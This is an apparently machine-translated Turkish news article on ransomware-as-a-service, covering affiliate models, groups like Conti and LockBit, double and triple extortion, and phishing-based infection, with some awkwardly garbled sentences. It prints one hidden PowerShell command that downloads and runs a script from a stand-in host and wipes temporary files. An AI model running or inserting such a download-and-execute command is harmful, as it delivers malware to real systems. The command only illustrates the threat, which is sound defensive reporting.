Hizmet Olarak Fidye Yazılımı (RAAS) fidye yazılımı saldırıları için baskın bir çerçeve olarak gelişti


Hizmet Olarak Fidye Yazılımı (RAAS) fidye yazılımı saldırıları için baskın bir çerçeve olarak gelişti

Siber güvenlik manzarası, dijital gasp yoluyla finansal kazanç arayan siber suçlular için baskın iş modeli olarak ortaya çıkan hizmet olarak fidye yazılımı (RAAS) ile önemli bir paradigma değişimine tanık oldu.

Bu aboneliğe dayalı model, teknik olarak vasıfsız suçluların dünya çapındaki kuruluşlara karşı sofistike kötü amaçlı yazılımlar dağıtmalarını sağlayan fidye yazılımı saldırılarını demokratikleştirdi.

RAAS operatörleri genellikle fidye ödemelerinin yüzdesi karşılığında, genellikle%20-30 arasında özelleştirilebilir fidye yazılımı yükleri, altyapı, ödeme işleme ve hatta teknik destek sağlar.

Google Haberleri

RAAS’ın evrimi, siber suç ekonomisinde doğal bir ilerlemeyi temsil eder ve fidye yazılımlarını izole saldırılardan endüstriyel ölçekli operasyonlara dönüştürür.

Conti, Revil ve Lockbit gibi dikkate değer RAAS grupları, kullanıcı dostu gösterge panoları, müşteri hizmetleri portalları ve bağlı kuruluş programları ile birlikte, hizmet olarak meşru yazılımları yansıtan sofistike operasyonel yapılar kurdu.

Bu gruplar, işlem izlemesini ve kolluk müdahalesini karmaşıklaştırmak için genellikle kripto para biriminde fidye talep eden kritik altyapı, sağlık tesisleri, eğitim kurumları ve şirketleri hedeflemiştir.

Securelist araştırmacılar, RAAS operasyonlarında rahatsız edici bir eğilim belirlediler ve birçok grubun şimdi çift ve üçlü gasp taktikleri kullandığını belirtti.

Securelist’in tehdit istihbarat ekibini son üç aylık raporlarında, “Verileri şifrelemenin ötesinde, modern RAAS operatörleri, şifrelemeden önce hassas bilgileri doldurur ve aynı zamanda kurbanların dijital varlıklarına karşı DDOS saldırılarını başlatırken, yayınlamakla tehdit eder” dedi.

Bu çok yönlü yaklaşım, yedekleme stratejilerinden bağımsız olarak mağdurların ödeme yapma baskısını önemli ölçüde artırır.

RAAS’ın etkisi yıkıcı olmuştur ve küresel fidye yazılımı zararlarının yıllık 30 milyar dolara ulaşacağı öngörülmektedir.

Kuruluşlar sadece fidye ödemelerinden doğrudan finansal kayıplarla değil, aynı zamanda operasyonel kesinti süreleri, veri ihlalleri için düzenleyici cezalar ve itibar hasarı ile karşı karşıyadır.

Ortalama fidye yazılımı ödemesi, 2020’den bu yana% 171 arttı ve RAAS operasyonlarının artan sofistike ve cesaretini yansıttı.

Enfeksiyon Mekanizmaları: Uzlaşma Gideri Kapısı

RAAS saldırıları genellikle kötü niyetli ekler veya bağlantılar içeren kimlik avı e -postaları aracılığıyla başlangıç ​​erişimiyle başlar.

Bu e -postalar genellikle alıcıları zararlı kod yürütmeye kandırmak için sosyal mühendislik tekniklerinden yararlanır.

Ortak bir enfeksiyon vektörü, RAAS kampanyalarında sıkça tanımlanan aşağıdaki PowerShell komutunda gösterildiği gibi, fidye yazılımı yükünü indirip yürüten makro özellikli ofis belgelerini içerir:

powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression(New-Object Net.WebClient).DownloadString('http://malicious-domain.com/payload.ps1'); Start-Sleep -s 3; Remove-Item $env:TEMP\* -Recurse -Force"

Bu komut arka planda sessizce çalışır, güvenlik kısıtlamalarını atlarken kötü amaçlı yükü indirir, ardından geçici dosyaları kaldırarak parçalarını kaplar.

Daha gelişmiş RAAS operasyonları, tamamen bellekte çalışan ve minimum adli kanıt bırakan evrelemesiz kötü amaçlı yazılım teknikleri kullanır.

Modern RAAS platformlarının modüler doğası, operatörlerin kalıcılık, yanal hareket ve ayrıcalık artışı için hedeflenen modülleri dağıtmasına olanak tanır.

Bir ağda kurulduktan sonra, RAAS kötü amaçlı yazılım genellikle şifrelemeyi başlatmadan önce değerli verileri tanımlamak, güvenlik mekanizmalarını devre dışı bırakmak ve yedekleme sistemlerine karşı kurcalamayı yapmak için keşif yapar.

Bu metodik yaklaşım, başarılı bir saldırı ve sonraki fidye ödemesi olasılığını en üst düzeye çıkarır ve günümüzün fidye yazılımı operasyonlarının giderek daha profesyonel doğasını gösterir.

Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.



Source link